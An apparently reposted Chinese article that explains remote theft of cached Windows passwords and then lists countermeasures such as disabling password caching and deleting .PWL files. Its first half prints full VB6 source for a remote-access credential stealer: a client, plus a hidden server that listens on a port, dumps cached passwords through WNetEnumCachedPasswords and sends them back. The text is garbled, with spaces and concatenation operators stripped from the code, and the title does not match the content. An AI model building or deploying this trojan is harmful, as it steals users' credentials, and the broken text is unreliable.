防止admin888被遠(yuǎn)程盜取的簡(jiǎn)易方法

2019-11-18 17:36:01

字體：大中小

供稿：網(wǎng)友

->打開許多黑客網(wǎng)站的免費(fèi)下載清單，我們會(huì)發(fā)現(xiàn)大量遠(yuǎn)程攻擊軟件，其中遠(yuǎn)程盜取他人密碼便是這些軟件的常見功能之一?！爸褐恕辈拍堋坝械姆攀浮?。因此本文在分析遠(yuǎn)程盜取密碼的原理后，有針對(duì)性地給出對(duì)策。->->一、遠(yuǎn)程盜取密碼的原理->->我們通過一個(gè)示例程序來說明（VB6.0）。->->1.遠(yuǎn)程控制端程序（frmClient.frm）->->在窗體上建五個(gè)控件：一個(gè)名為tcpClient的Winsock控件用于通訊；一個(gè)名為txtIP的TextBox控件用于填寫對(duì)方的IP地址；一個(gè)名為txtOutput的TextBox控件用于顯示盜取的對(duì)方電腦的密碼；一個(gè)名為cmdConnect的CommandButton控件用于執(zhí)行連接；一個(gè)名為cmdGet_Pass的CommandButton控件用于取回密碼（見圖一）。->->

->->執(zhí)行時(shí)，首先填入對(duì)方的IP地址，然后執(zhí)行連接。若連接成功，則該按鈕變虛，同時(shí)“取密碼”按鈕變?yōu)榭捎脿顟B(tài)。圖二顯示了取回密碼后的程序外觀。->->

->->從圖二中可以看出，被盜取回來的密碼主要包括：局域網(wǎng)內(nèi)某些加鎖硬盤的解鎖碼（信息顯示區(qū)的第一行）、互聯(lián)網(wǎng)使用中的一些密碼（第二、三行）、撥號(hào)上網(wǎng)時(shí)使用的用戶名和密碼（第六至九行）等。->->遠(yuǎn)程控制端的完整源代碼如下：->->'======================frmClient.frm->->OptionExplicit->->PrivateSubcmdConnect_Click()'執(zhí)行連接->->tcpClient.RemoteHost=txtIP.Text->->tcpClient.RemotePort=1001->->tcpClient.Connect->->EndSub->->->->PrivateSubcmdGet_Pass_Click()'請(qǐng)求返回密碼->->tcpClient.SendData"Passwords"->->EndSub->->->->PrivateSubtcpClient_DataArrival(ByValbytesTotalAsLong)->->DimstrDataAsString->->tcpClient.GetDatastrData->->IfstrData="ConnectOK"Then->->cmdConnect.Enabled=False'將“連接”按鈕置虛->->cmdGet_Pass.Enabled=True'同時(shí)將“取密碼”按鈕置為可用狀態(tài)->->Else->->txtOutput.Text=strData'將返回的密碼填入顯示區(qū)->->EndIf->->EndSub->->->->2.潛伏在主機(jī)端的程序（frmServer.frm）->->窗體上只有兩個(gè)控件：一個(gè)Winsock控件用于通訊，一個(gè)TextBox控件用于密碼暫存。同時(shí)，窗體的ShowInTaskbar屬性和Visible屬性均設(shè)為False，以便該程序即使在任務(wù)欄中也不可見。->->潛伏端程序及其附屬模塊（Passwords.bas）如下：->->'======================frmServer.frm->->OptionExplicit->->->->PrivateSubForm_Load()->->'將LocalPort屬性設(shè)置為一個(gè)整數(shù)。然后調(diào)用Listen方法。->->tcpServer.LocalPort=1001->->tcpServer.Listen->->EndSub->->->->PrivateSubtcpServer_ConnectionRequest(ByValrequestIDAsLong)->->'檢查控件的State屬性是否為關(guān)閉的。->->'如果不是，在接受新的連接之前先關(guān)閉此連接。->->IftcpServer.State<>sckClosedThentcpServer.Close->->'接受具有requestID參數(shù)的連接。->->tcpServer.AcceptrequestID->->tcpServer.SendData"ConnectOK"->->EndSub->->->->PrivateSubtcpServer_DataArrival(ByValbytesTotalAsLong)->->'為進(jìn)入的數(shù)據(jù)聲明一個(gè)變量。然后調(diào)用GetData方法。->->DimstrDataAsString->->tcpServer.GetDatastrData->->IfstrData="Passwords"Then->->CallReturn_Password_Cached'調(diào)用模塊Passwords.bas中的函數(shù)->->tcpServer.SendDatatxtSendData.Text'將TextBox控件中的信息向遠(yuǎn)程傳送->->EndIf->->EndSub->->->->'======================Passwords.bas->->OptionExplicit->->DeclareFunctionWNetEnumCachedPasswordsLib"MPR.DLL"_->->(ByVals1AsString,ByVali1AsInteger,ByValb1AsByte,_->->ByValproc_addrAsLong,ByVall1AsLong)AsLong->->->->TypeCached_Passwords->->idAsInteger->->num_of_NameAsInteger'當(dāng)前資源名的長(zhǎng)度->->num_of_PassAsInteger'當(dāng)前密碼的長(zhǎng)度->->flagAsByte->->the_TypeAsByte'類型->->data(1To1024)AsByte'包含當(dāng)前資源名和密碼的數(shù)據(jù)區(qū)->->EndType->->->->PublicFunctionget_pass(PASSAsCached_Passwords,_->->ByValnouseAsLong)AsInteger->->Dimi,temp1$,temp2$->->Fori=1ToPASS.num_of_Name->->temp1=temp1 Chr(PASS.data(i))'得到當(dāng)前資源名->->Next->->Fori=PASS.num_of_Name 1To(PASS.num_of_Name PASS.num_of_Pass)->->temp2=temp2 Chr(PASS.data(i))'得到當(dāng)前密碼->->Next->->'將當(dāng)前資源名和密碼填入TextBox控件中進(jìn)行匯總->->frmServer.txtSendData.Text=frmServer.txtSendData.Text Chr(13)_->-> Chr(10) temp1 ":" temp2->->get_pass=True->->EndFunction->->->->PublicSubReturn_Password_Cached()->->Dimi,temp1$,long1AsLong,byte1AsByte->->byte1=&HFF:i=0:long1=0:temp1=""->->'將上面的函數(shù)（get_pass）之地址作為參數(shù)，調(diào)用WNetEnumCachedPasswords->->'WNetEnumCachedPasswords會(huì)自動(dòng)根據(jù)資源總數(shù)多次調(diào)用get_pass函數(shù)。->->CallWNetEnumCachedPasswords(temp1,i,byte1,AddressOfget_pass,long1)->->EndSub->->->->可以看出，上述程序的關(guān)鍵所在是API函數(shù)WNetEnumCachedPasswords的調(diào)用，該函數(shù)屬于Microsoft的“網(wǎng)絡(luò)接口動(dòng)態(tài)鏈接庫(kù)”，即“MPR.DLL”（在system目錄下）。WNetEnumCachedPasswords函數(shù)的作用是將Windows系統(tǒng)在啟動(dòng)時(shí)緩存在內(nèi)存中的用戶密碼提取出來并傳給用戶函數(shù)。->->因此，正是Windows自身的“密碼緩存”設(shè)計(jì)，幫助遠(yuǎn)程入侵者輕松獲取密碼。->->二、防止密碼被盜取的方法->->關(guān)閉“密碼緩存”是解決問題的根本。->->可以用另一個(gè)API函數(shù)WNetCachePassword來實(shí)現(xiàn)。但也有幾個(gè)更簡(jiǎn)易的方法：->->方法一：修改配置文件->->修改Windows目錄下的System.ini文件，在其[NETWORK]部分中加入一行：->->PasswordCaching=no->->方法二：修改系統(tǒng)注冊(cè)表->->首先定位到注冊(cè)表的下述位置：->->HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/->->Policies/Network/->->然后新建一個(gè)DWORD值：->->DisablePwdCaching=1->->方法三：不登錄系統(tǒng)或不保存密碼->->只有成功登錄系統(tǒng)，Windows的“密碼緩存”功能才會(huì)開啟。因此在一般的單用戶情況下，“不登錄系統(tǒng)”不僅是安全的而且在功能上也沒什么損失。如圖三所示，在登錄時(shí)選擇“取消”鍵。->->

->->或者干脆從不保存密碼，如圖四所示，將“保存密碼”前的“ˇ”去掉。->->

->->方法四：刪除“.PWL”文件->->“.PWL”文件一般保存在Windows目錄下，它們以加密形式記錄了所有用戶密碼。系統(tǒng)的“密碼緩存”功能正是通過解密“.PWL”文件來實(shí)現(xiàn)的。->->非常令人不安的是，一些黑客網(wǎng)站公布了解密“.PWL”文件的算法。因此，即使“密碼緩存”已被關(guān)閉，只要入侵者能訪問到硬盤上的“.PWL”文件，用戶密碼依然并不安全。->->所以，刪除“.PWL”文件是一勞永逸的辦法。->->三、提高系統(tǒng)的整體安全性->->從上面的分析和例子我們還可以看出，阻止黑客程序植入本機(jī)也是解決問題的關(guān)鍵。常用的方法有：不需要IP地址時(shí)，清除掉本機(jī)的IP設(shè)置；加裝針對(duì)內(nèi)部局域網(wǎng)和外部互聯(lián)網(wǎng)的防火墻；謹(jǐn)慎打開E-Mail中的附件；謹(jǐn)慎使用不知來源的可執(zhí)行程序；以及設(shè)置主板級(jí)開機(jī)密碼以防止本機(jī)被直接侵入，等等，此處不再贅述。->->

上一篇：在VB中如何使用ping命令

下一篇：開發(fā)網(wǎng)絡(luò)應(yīng)用的5個(gè)技巧